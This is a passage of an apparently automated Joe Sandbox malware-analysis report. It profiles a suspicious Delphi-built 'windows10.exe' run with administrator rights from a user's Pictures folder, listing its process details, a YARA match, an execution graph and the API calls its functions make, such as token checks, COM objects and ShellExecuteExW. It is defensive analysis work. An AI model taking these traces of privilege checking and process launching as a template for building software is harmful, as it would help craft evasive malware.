                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001E.00000002.2500873728.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:32
                                                                    Start time:04:32:11
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000020.00000002.2509121919.0000000000A41000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:27.6%
                                                                      Total number of Nodes:344
                                                                      Total number of Limit Nodes:5
                                                                      execution_graph 35054 3e7f70 35057 3e7fd0 GetTokenInformation 35054->35057 35058 3e804e GetLastError 35057->35058 35059 3e7fa8 35057->35059 35058->35059 35060 3e8059 35058->35060 35061 3e8069 _Getvals 35060->35061 35062 3e809e GetTokenInformation 35060->35062 35063 3e8079 35060->35063 35061->35062 35062->35059 35066 3e8260 45 API calls 3 library calls 35063->35066 35065 3e8082 35065->35062 35066->35065 35067 407e5e 35068 407e6a __FrameHandler3::FrameUnwindToState 35067->35068 35093 4079c1 35068->35093 35070 407e71 35071 407fc4 35070->35071 35081 407e9b ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 35070->35081 35140 4083bd 4 API calls 2 library calls 35071->35140 35073 407fcb 35141 41854c 23 API calls std::locale::_Setgloballocale 35073->35141 35075 407fd1 35142 418510 23 API calls std::locale::_Setgloballocale 35075->35142 35077 407fd9 35078 407eba 35079 407f3b 35104 4084d8 35079->35104 35081->35078 35081->35079 35139 418526 41 API calls 4 library calls 35081->35139 35082 407f41 35108 3f1a20 GetCommandLineW 35082->35108 35094 4079ca 35093->35094 35143 40801c IsProcessorFeaturePresent 35094->35143 35096 4079d6 35144 40ae59 10 API calls 2 library calls 35096->35144 35098 4079db 35099 4079df 35098->35099 35145 418fb0 35098->35145 35099->35070 35102 4079f6 35102->35070 35204 408e90 35104->35204 35106 4084eb GetStartupInfoW 35107 4084fe 35106->35107 35107->35082 35109 3f1a60 35108->35109 35205 3e4ec0 LocalAlloc 35109->35205 35111 3f1a71 35206 3e8ba0 35111->35206 35113 3f1ac9 35114 3f1add 35113->35114 35115 3f1acd 35113->35115 35214 3f0b70 LocalAlloc LocalAlloc 35114->35214 35261 3e8790 81 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 35115->35261 35118 3f1ad6 35120 3f1c26 ExitProcess 35118->35120 35119 3f1ae9 35215 3f0e90 35119->35215 35126 3f1b2b 35233 3eae00 35126->35233 35128 3f1bb4 35134 3f1c08 35128->35134 35239 3e8e20 35128->35239 35129 3f1b82 35129->35128 35130 3e29d0 44 API calls 35129->35130 35130->35128 35132 3f1bef 35133 3f1bfb 35132->35133 35132->35134 35262 3f1400 CreateFileW SetFilePointer WriteFile CloseHandle 35133->35262 35263 3e4000 42 API calls 35134->35263 35137 3f1c17 35264 3f1c30 LocalFree LocalFree 35137->35264 35139->35079 35140->35073 35141->35075 35142->35077 35143->35096 35144->35098 35149 42154e 35145->35149 35148 40ae78 7 API calls 2 library calls 35148->35099 35150 42155e 35149->35150 35151 4079e8 35149->35151 35150->35151 35153 41c2f6 35150->35153 35151->35102 35151->35148 35154 41c302 __FrameHandler3::FrameUnwindToState 35153->35154 35165 4172ca EnterCriticalSection 35154->35165 35156 41c309 35166 421abc 35156->35166 35159 41c327 35181 41c34d LeaveCriticalSection std::_Lockit::~_Lockit 35159->35181 35162 41c322 35180 41c246 GetStdHandle GetFileType 35162->35180 35163 41c338 35163->35150 35165->35156 35167 421ac8 __FrameHandler3::FrameUnwindToState 35166->35167 35168 421af2 35167->35168 35169 421ad1 35167->35169 35182 4172ca EnterCriticalSection 35168->35182 35190 40c6b0 14 API calls __dosmaperr 35169->35190 35172 421ad6 35191 40c5b2 41 API calls __cftoe 35172->35191 35174 421b2a 35192 421b51 LeaveCriticalSection std::_Lockit::~_Lockit 35174->35192 35175 41c318 35175->35159 35179 41c190 44 API calls 35175->35179 35176 421afe 35176->35174 35183 421a0c 35176->35183 35179->35162 35180->35159 35181->35163 35182->35176 35193 41c72b 35183->35193 35185 421a1e 35189 421a2b 35185->35189 35200 41cddf 6 API calls std::_Locinfo::_Locinfo_ctor 35185->35200 35187 421a80 35187->35176 35201 41aa28 14 API calls 2 library calls 35189->35201 35190->35172 35191->35175 35192->35175 35194 41c738 __cftoe 35193->35194 35195 41c763 RtlAllocateHeap 35194->35195 35196 41c778 35194->35196 35202 4215f6 EnterCriticalSection LeaveCriticalSection __cftoe 35194->35202 35195->35194 35198 41c776 35195->35198 35203 40c6b0 14 API calls __dosmaperr 35196->35203 35198->35185 35200->35185 35201->35187 35202->35194 35203->35198 35204->35106 35205->35111 35207 3e8bf2 35206->35207 35208 3e8c34 35207->35208 35211 3e8c22 35207->35211 35209 407708 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35208->35209 35210 3e8c42 35209->35210 35210->35113 35265 407708 35211->35265 35213 3e8c30 35213->35113 35214->35119 35216 3f0ea4 35215->35216 35217 3f1242 35215->35217 35216->35217 35218 3f12a0 35216->35218 35222 3e29d0 35217->35222 35273 3e83e0 14 API calls 35218->35273 35220 3f12b0 RegOpenKeyExW 35220->35217 35221 3f12ce RegQueryValueExW 35220->35221 35221->35217 35223 3e29f1 35222->35223 35223->35223 35274 3e3b40 35223->35274 35225 3e2a09 35226 3e9110 35225->35226 35293 3e2a10 35226->35293 35228 3e9156 35311 3e98d0 35228->35311 35234 3eae0d 35233->35234 35235 3eae0a 35233->35235 35236 3eae1a ___vcrt_FlsGetValue 35234->35236 35359 410f1e 42 API calls 2 library calls 35234->35359 35235->35129 35236->35129 35238 3eae2d 35238->35129 35240 3e8e69 35239->35240 35241 3e8e54 35239->35241 35360 3e5f90 GetCurrentProcess OpenProcessToken 35240->35360 35241->35132 35243 3e8e7c 35244 3e8f3e 35243->35244 35246 3e8e96 35243->35246 35245 3e1fc0 67 API calls 35244->35245 35247 3e8f65 35245->35247 35365 3e1fc0 35246->35365 35249 3e1fc0 67 API calls 35247->35249 35251 3e8f7a 35249->35251 35250 3e8eaa 35252 3e1fc0 67 API calls 35250->35252 35253 3e1fc0 67 API calls 35251->35253 35254 3e8ec7 35252->35254 35255 3e8f8b 35253->35255 35256 3e1fc0 67 API calls 35254->35256 35431 3e7660 35255->35431 35259 3e8ed5 35256->35259 35258 3e8eed 35258->35132 35384 3e6ee0 35259->35384 35261->35118 35262->35134 35263->35137 35264->35120 35266 407710 35265->35266 35267 407711 IsProcessorFeaturePresent 35265->35267 35266->35213 35269 407bd9 35267->35269 35272 407b9c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 35269->35272 35271 407cbc 35271->35213 35272->35271 35273->35220 35275 3e3c15 35274->35275 35280 3e3b54 35274->35280 35291 3e3680 42 API calls collate 35275->35291 35276 3e3b60 _LStrxfrm 35276->35225 35278 3e3b8d 35281 3e3c10 35278->35281 35285 3e3bbf LocalAlloc 35278->35285 35279 3e3c1a 35292 40c5c2 41 API calls 2 library calls 35279->35292 35280->35276 35280->35278 35280->35281 35284 3e3bd7 35280->35284 35290 3e3af0 RaiseException CallUnexpected collate 35281->35290 35288 3e3bdb LocalAlloc 35284->35288 35289 3e3be8 _LStrxfrm 35284->35289 35285->35279 35287 3e3bcc 35285->35287 35287->35289 35288->35289 35289->35225 35298 3e2a36 35293->35298 35294 3e2afc 35349 3e3680 42 API calls collate 35294->35349 35295 3e2a52 _LStrxfrm 35295->35228 35297 3e2a77 35301 3e2af7 35297->35301 35304 3e2aa9 LocalAlloc 35297->35304 35298->35294 35298->35295 35298->35297 35298->35301 35303 3e2ac1 35298->35303 35299 3e2b01 35350 40c5c2 41 API calls 2 library calls 35299->35350 35348 3e3af0 RaiseException CallUnexpected collate 35301->35348 35307 3e2ac5 LocalAlloc 35303->35307 35309 3e2ad2 _LStrxfrm 35303->35309 35304->35299 35306 3e2ab6 35304->35306 35306->35309 35307->35309 35309->35228 35312 3e992a ___vcrt_FlsGetValue 35311->35312 35318 3e9a92 ___vcrt_FlsGetValue 35311->35318 35315 3e9955 35312->35315 35312->35318 35313 407708 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35314 3e916b 35313->35314 35338 3e9bf0 35314->35338 35316 3e9972 35315->35316 35317 3e9bd1 35315->35317 35320 3e3b40 44 API calls 35316->35320 35354 3e4650 42 API calls 35317->35354 35321 3e9bdb 35318->35321 35322 3e9aeb 35318->35322 35334 3e9a79 35318->35334 35325 3e9996 35320->35325 35356 3e4650 42 API calls 35321->35356 35326 3e3b40 44 API calls 35322->35326 35323 3e9bd6 35355 40c5c2 41 API calls 2 library calls 35323->35355 35351 3e9ef0 45 API calls _LStrxfrm 35325->35351 35330 3e9b0f 35326->35330 35353 3e3cc0 42 API calls collate 35330->35353 35331 3e99b1 35352 3e3cc0 42 API calls collate 35331->35352 35334->35313 35335 3e99fa 35335->35323 35335->35334 35336 3e9a6e 35335->35336 35336->35334 35337 3e9a72 LocalFree 35336->35337 35337->35334 35347 3e9c6c _LStrxfrm 35338->35347 35339 3e9183 35339->35126 35340 3e9e96 35340->35339 35342 3e9eb0 LocalFree 35340->35342 35341 3e9ee0 35357 40c5c2 41 API calls 2 library calls 35341->35357 35342->35339 35344 3e9ee5 35358 3e4650 42 API calls 35344->35358 35347->35339 35347->35340 35347->35341 35347->35344 35351->35331 35352->35335 35353->35334 35359->35238 35361 3e5fb7 GetTokenInformation 35360->35361 35362 3e5fb1 35360->35362 35363 3e5fee CloseHandle 35361->35363 35364 3e5fe6 35361->35364 35362->35243 35363->35243 35364->35363 35480 3e2510 35365->35480 35368 3e20ea 35499 3e1910 LocalFree RaiseException CallUnexpected 35368->35499 35371 3e20fe 35372 3e1ffa 35383 3e209f 35372->35383 35495 3e1cb0 10 API calls 35372->35495 35374 3e202c 35375 3e2036 FindResourceW 35374->35375 35374->35383 35376 3e204e 35375->35376 35375->35383 35496 3e1d70 LoadResource LockResource SizeofResource 35376->35496 35378 3e2058 35379 3e207f 35378->35379 35378->35383 35497 3e2750 41 API calls 35378->35497 35498 40c995 41 API calls 3 library calls 35379->35498 35382 3e208f 35382->35383 35500 3e1910 LocalFree RaiseException CallUnexpected 35382->35500 35383->35250 35385 3e5f90 4 API calls 35384->35385 35386 3e6f2d 35385->35386 35387 3e6f55 CoInitialize CoCreateInstance 35386->35387 35388 3e6f33 35386->35388 35390 3e6f98 VariantInit 35387->35390 35391 3e6f8f 35387->35391 35389 3e7660 90 API calls 35388->35389 35393 3e6f4d 35389->35393 35392 3e6fde 35390->35392 35391->35393 35394 3e74f6 CoUninitialize 35391->35394 35395 3e6ff1 IUnknown_QueryService 35392->35395 35403 3e6fe8 VariantClear 35392->35403 35396 407708 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35393->35396 35394->35393 35399 3e7020 35395->35399 35395->35403 35397 3e7516 35396->35397 35397->35258 35400 3e7071 IUnknown_QueryInterface_Proxy 35399->35400 35399->35403 35401 3e709a 35400->35401 35400->35403 35402 3e70bf IUnknown_QueryInterface_Proxy 35401->35402 35401->35403 35402->35403 35404 3e70e8 CoAllowSetForegroundWindow 35402->35404 35403->35391 35405 3e7168 SysAllocString 35404->35405 35406 3e7102 SysAllocString 35404->35406 35405->35406 35407 3e751f _com_issue_error 35405->35407 35410 3e712f 35406->35410 35411 3e7138 SysAllocString 35406->35411 35512 3e1910 LocalFree RaiseException CallUnexpected 35407->35512 35410->35407 35410->35411 35413 3e717d VariantInit 35411->35413 35414 3e715d 35411->35414 35412 3e7533 35412->35258 35417 3e71fd 35413->35417 35414->35407 35414->35413 35415 3e7201 VariantClear VariantClear VariantClear VariantClear SysFreeString 35415->35403 35417->35415 35430 3e724b 35417->35430 35418 3e3b40 44 API calls 35418->35430 35422 3e751a 35511 40c5c2 41 API calls 2 library calls 35422->35511 35423 3e72ef LocalFree 35423->35430 35425 3e7344 OpenProcess WaitForSingleObject 35426 3e737a GetExitCodeProcess 35425->35426 35425->35430 35426->35430 35428 3e7394 CloseHandle 35428->35430 35429 3e73dd LocalFree 35429->35430 35430->35415 35430->35417 35430->35418 35430->35422 35430->35423 35430->35425 35430->35428 35430->35429 35507 3e40a0 50 API calls 3 library calls 35430->35507 35508 3e61d0 95 API calls 2 library calls 35430->35508 35509 3e3cc0 42 API calls collate 35430->35509 35510 3e6a60 10 API calls 35430->35510 35432 3e76d1 35431->35432 35513 3e2100 42 API calls 4 library calls 35432->35513 35434 3e76e9 35514 3e2100 42 API calls 4 library calls 35434->35514 35436 3e7700 35515 3e7db0 59 API calls 2 library calls 35436->35515 35438 3e7718 35439 3e7a7b 35438->35439 35440 3e7747 35438->35440 35516 3e2750 41 API calls 35438->35516 35524 3e1910 LocalFree RaiseException CallUnexpected 35439->35524 35517 410d39 43 API calls 35440->35517 35443 3e7a85 GetWindowThreadProcessId 35445 3e7aae GetWindowLongW 35443->35445 35446 3e7ae1 35443->35446 35445->35258 35446->35258 35447 3e7755 35447->35439 35448 3e7766 35447->35448 35518 3e2100 42 API calls 4 library calls 35448->35518 35450 3e784f 35451 3e78ad 35450->35451 35452 3e78a4 GetForegroundWindow 35450->35452 35453 3e78bd ShellExecuteExW 35451->35453 35452->35451 35454 3e78ce 35453->35454 35455 3e78d7 35453->35455 35521 3e7c30 6 API calls 35454->35521 35458 3e7912 35455->35458 35460 3e78ed ShellExecuteExW 35455->35460 35456 3e7816 GetWindowsDirectoryW 35519 3e1980 70 API calls 35456->35519 35465 3e79c8 35458->35465 35466 3e7938 GetModuleHandleW GetProcAddress 35458->35466 35460->35458 35462 3e7909 35460->35462 35461 3e7837 35520 3e1980 70 API calls 35461->35520 35522 3e7c30 6 API calls 35462->35522 35468 3e79f2 35465->35468 35469 3e79dc WaitForSingleObject GetExitCodeProcess 35465->35469 35471 3e7952 AllowSetForegroundWindow 35466->35471 35467 3e777b 35467->35450 35467->35456 35523 3e7d30 CloseHandle 35468->35523 35469->35468 35471->35465 35472 3e7960 35471->35472 35472->35465 35473 3e7969 GetModuleHandleW GetProcAddress 35472->35473 35473->35465 35474 3e7984 35473->35474 35474->35465 35478 3e7995 Sleep EnumWindows 35474->35478 35475 3e79fe 35476 407708 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35475->35476 35477 3e7a73 35476->35477 35477->35258 35478->35474 35479 3e79c1 BringWindowToTop 35478->35479 35479->35465 35481 3e2548 35480->35481 35492 3e259c 35480->35492 35501 407875 6 API calls 35481->35501 35484 3e2552 35486 3e255e GetProcessHeap 35484->35486 35484->35492 35485 3e25b6 35494 3e1ff0 35485->35494 35505 407b87 44 API calls 35485->35505 35502 407b87 44 API calls 35486->35502 35489 3e258b 35503 40782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35489->35503 35490 3e2616 35506 40782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35490->35506 35492->35494 35504 407875 6 API calls 35492->35504 35494->35368 35494->35372 35495->35374 35496->35378 35497->35379 35498->35382 35499->35382 35500->35371 35501->35484 35502->35489 35503->35492 35504->35485 35505->35490 35506->35494 35507->35430 35508->35430 35509->35430 35510->35430 35512->35412 35513->35434 35514->35436 35515->35438 35516->35440 35517->35447 35518->35467 35519->35461 35520->35450 35521->35455 35522->35458 35523->35475 35524->35443

                                                                      Executed Functions

                                                                      Function 003E6EE0 Relevance: 46.0, APIs: 25, Strings: 1, Instructions: 519comCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 3e6ee0-3e6f31 call 3e5f90 3 3e6f55-3e6f8d CoInitialize CoCreateInstance 0->3 4 3e6f33-3e6f50 call 3e7660 0->4 6 3e6f8f-3e6f93 3->6 7 3e6f98-3e6fe6 VariantInit 3->7 10 3e74ff-3e7519 call 407708 4->10 9 3e74d8-3e74e1 6->9 16 3e6fe8-3e6fec 7->16 17 3e6ff1-3e7015 IUnknown_QueryService 7->17 11 3e74e9-3e74f4 9->11 12 3e74e3-3e74e5 9->12 14 3e74fc 11->14 15 3e74f6 CoUninitialize 11->15 12->11 14->10 15->14 19 3e74ba-3e74c3 16->19 20 3e7017-3e701b 17->20 21 3e7020-3e703a 17->21 23 3e74cb-3e74d6 VariantClear 19->23 24 3e74c5-3e74c7 19->24 25 3e74a9-3e74b2 20->25 28 3e703c-3e7040 21->28 29 3e7045-3e7066 21->29 23->9 24->23 25->19 27 3e74b4-3e74b6 25->27 27->19 30 3e7498-3e74a1 28->30 33 3e7068-3e706c 29->33 34 3e7071-3e708f IUnknown_QueryInterface_Proxy 29->34 30->25 32 3e74a3-3e74a5 30->32 32->25 35 3e7487-3e7490 33->35 36 3e709a-3e70b4 34->36 37 3e7091-3e7095 34->37 35->30 39 3e7492-3e7494 35->39 42 3e70bf-3e70dd IUnknown_QueryInterface_Proxy 36->42 43 3e70b6-3e70ba 36->43 38 3e7476-3e747f 37->38 38->35 40 3e7481-3e7483 38->40 39->30 40->35 45 3e70df-3e70e3 42->45 46 3e70e8-3e7100 CoAllowSetForegroundWindow 42->46 44 3e7465-3e746e 43->44 44->38 47 3e7470-3e7472 44->47 48 3e7454-3e745d 45->48 49 3e7168-3e7175 SysAllocString 46->49 50 3e7102-3e7104 46->50 47->38 48->44 54 3e745f-3e7461 48->54 51 3e717b 49->51 52 3e7529-3e7571 call 3e1910 49->52 53 3e710a-3e712d SysAllocString 50->53 51->53 63 3e7579-3e7587 52->63 64 3e7573-3e7575 52->64 56 3e712f-3e7132 53->56 57 3e7138-3e715b SysAllocString 53->57 54->44 56->57 59 3e751f-3e7524 call 3f1cb0 56->59 60 3e717d-3e71ff VariantInit 57->60 61 3e715d-3e7160 57->61 59->52 67 3e720a-3e720e 60->67 68 3e7201-3e7205 60->68 61->59 62 3e7166 61->62 62->60 64->63 70 3e740b 67->70 71 3e7214 67->71 69 3e740f-3e744e VariantClear * 4 SysFreeString 68->69 69->48 70->69 72 3e7216-3e7238 71->72 73 3e7240-3e7249 72->73 73->73 74 3e724b-3e72c5 call 3e3b40 call 3e40a0 call 3e61d0 call 3e3cc0 73->74 83 3e72f6-3e7315 74->83 84 3e72c7-3e72d8 74->84 87 3e731d 83->87 88 3e7317-3e731b 83->88 85 3e72da-3e72e5 84->85 86 3e72eb-3e72ed 84->86 85->86 89 3e751a call 40c5c2 85->89 86->83 90 3e72ef-3e72f0 LocalFree 86->90 91 3e7324-3e7326 87->91 88->91 89->59 90->83 92 3e7328-3e7332 91->92 93 3e73a5-3e73b5 91->93 97 3e7344-3e7378 OpenProcess WaitForSingleObject 92->97 98 3e7334-3e7342 call 3e6a60 92->98 95 3e73fc-3e7405 93->95 96 3e73b7-3e73c6 93->96 95->70 95->72 101 3e73c8-3e73d3 96->101 102 3e73d9-3e73db 96->102 99 3e737a-3e737c GetExitCodeProcess 97->99 100 3e7382-3e7392 97->100 98->97 99->100 100->93 104 3e7394-3e739b CloseHandle 100->104 101->89 101->102 105 3e73dd-3e73de LocalFree 102->105 106 3e73e4-3e73f5 102->106 104->93 105->106 106->95
                                                                      APIs
                                                                        • Part of subcall function 003E5F90: GetCurrentProcess.KERNEL32(00000008,?,755CD0F6), ref: 003E5FA0
                                                                        • Part of subcall function 003E5F90: OpenProcessToken.ADVAPI32(00000000), ref: 003E5FA7
                                                                      • CoInitialize.OLE32(00000000), ref: 003E6F55
                                                                      • CoCreateInstance.OLE32(0042D310,00000000,00000004,0043B320,00000000,?), ref: 003E6F85
                                                                      • CoUninitialize.OLE32 ref: 003E74F6
                                                                      • _com_issue_error.COMSUPP ref: 003E7524
                                                                        • Part of subcall function 003E1910: LocalFree.KERNEL32(?,755CD0F6,?,00000000,004292C0,000000FF,?,?,00441348,00000000,003E16D0,80004005), ref: 003E195C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                      • String ID: $
                                                                      • API String ID: 2507920217-3993045852
                                                                      • Opcode ID: 1ca910e5451a69b3fd9ee6141759ebba37262f05ae27a4974fb756373095a4dd
                                                                      • Instruction ID: 90f749c0f5d49fde13ac7e63401a1ae796e358e00c2f18b5ae1d310daeb29110
                                                                      • Opcode Fuzzy Hash: 1ca910e5451a69b3fd9ee6141759ebba37262f05ae27a4974fb756373095a4dd
                                                                      • Instruction Fuzzy Hash: 4522C170E04398DFEB12CFA9C948B9DBBB8AF45304F248299E405EB2C1D7759E45CB51
                                                                      Function 003E5F90 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 108 3e5f90-3e5faf GetCurrentProcess OpenProcessToken 109 3e5fb7-3e5fe4 GetTokenInformation 108->109 110 3e5fb1-3e5fb6 108->110 111 3e5fee-3e5ffe CloseHandle 109->111 112 3e5fe6-3e5feb 109->112 112->111
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000008,?,755CD0F6), ref: 003E5FA0
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 003E5FA7
                                                                      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 003E5FDC
                                                                      • CloseHandle.KERNEL32(?), ref: 003E5FF2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                      • String ID:
                                                                      • API String ID: 215268677-0
                                                                      • Opcode ID: 459562e0bfaae24554e102f00dbc3ad4b848c2d3a5328d0cecc6feaa7066fdbf
                                                                      • Instruction ID: ff9c0fdcc5f929f3c862eeb6bd21f8d4213874f841809cfade97b52b0aaa2474
                                                                      • Opcode Fuzzy Hash: 459562e0bfaae24554e102f00dbc3ad4b848c2d3a5328d0cecc6feaa7066fdbf
                                                                      • Instruction Fuzzy Hash: 43F01274544301EBE7119F10EC49B9AB7E8BB44708F908829F984C21A0D779D51EDA67
                                                                      Function 003F1A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32(755CD0F6,?,0000FFFF), ref: 003F1A4D
                                                                        • Part of subcall function 003E4EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 003E4EDD
                                                                      • ExitProcess.KERNEL32 ref: 003F1C27
                                                                        • Part of subcall function 003E8790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003E880D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                      • String ID: Full command line:
                                                                      • API String ID: 1878577176-831861440
                                                                      • Opcode ID: 7373685995bdf3526a8110768491acc9497e5d2aec67cf15c01cfde10f54ff6e
                                                                      • Instruction ID: 3b738205682251a7bd6febc178f60ecd348cc687d5fd1bfaec418155ff0ecef4
                                                                      • Opcode Fuzzy Hash: 7373685995bdf3526a8110768491acc9497e5d2aec67cf15c01cfde10f54ff6e
                                                                      • Instruction Fuzzy Hash: 2E517F30D10168DACB16EB21DC59BEEB775AF54300F1442D9E1096B2E2EF741F49CB91
                                                                      Function 003E7FD0 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 171 3e7fd0-3e804c GetTokenInformation 172 3e804e-3e8057 GetLastError 171->172 173 3e80b0-3e80c3 171->173 172->173 174 3e8059-3e8067 172->174 175 3e806e 174->175 176 3e8069-3e806c 174->176 178 3e809e-3e80aa GetTokenInformation 175->178 179 3e8070-3e8077 175->179 177 3e809b 176->177 177->178 178->173 180 3e8079-3e8085 call 3e8260 179->180 181 3e8087-3e8098 call 408e90 179->181 180->178 181->177
                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,003E7FA8,755CD0F6), ref: 003E8044
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,003E7FA8,755CD0F6), ref: 003E804E
                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,003E7FA8,755CD0F6), ref: 003E80AA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: InformationToken$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2567405617-0
                                                                      • Opcode ID: 91634f2ab5937240ebd8d182368032f2a8552ef444b38714d1a71676ea67ecef
                                                                      • Instruction ID: 9cb2b3818910e1096dd25f3726c509b439633566ee1132ee1ba961dc10dcf393
                                                                      • Opcode Fuzzy Hash: 91634f2ab5937240ebd8d182368032f2a8552ef444b38714d1a71676ea67ecef
                                                                      • Instruction Fuzzy Hash: 2231AE71A00615AFD720CF59CC45BAFFBF9FB44714F10462EE515A7280DBB5AD048BA4
                                                                      Function 0041C72B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 186 41c72b-41c736 187 41c744-41c74a 186->187 188 41c738-41c742 186->188 189 41c763-41c774 RtlAllocateHeap 187->189 190 41c74c-41c74d 187->190 188->187 191 41c778-41c783 call 40c6b0 188->191 192 41c776 189->192 193 41c74f-41c756 call 41a8b7 189->193 190->189 196 41c785-41c787 191->196 192->196 193->191 199 41c758-41c761 call 4215f6 193->199 199->189 199->191
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,?,?,0041AFDA,00000001,00000364,?,00000006,000000FF,?,0040C282,?,?,?), ref: 0041C76C
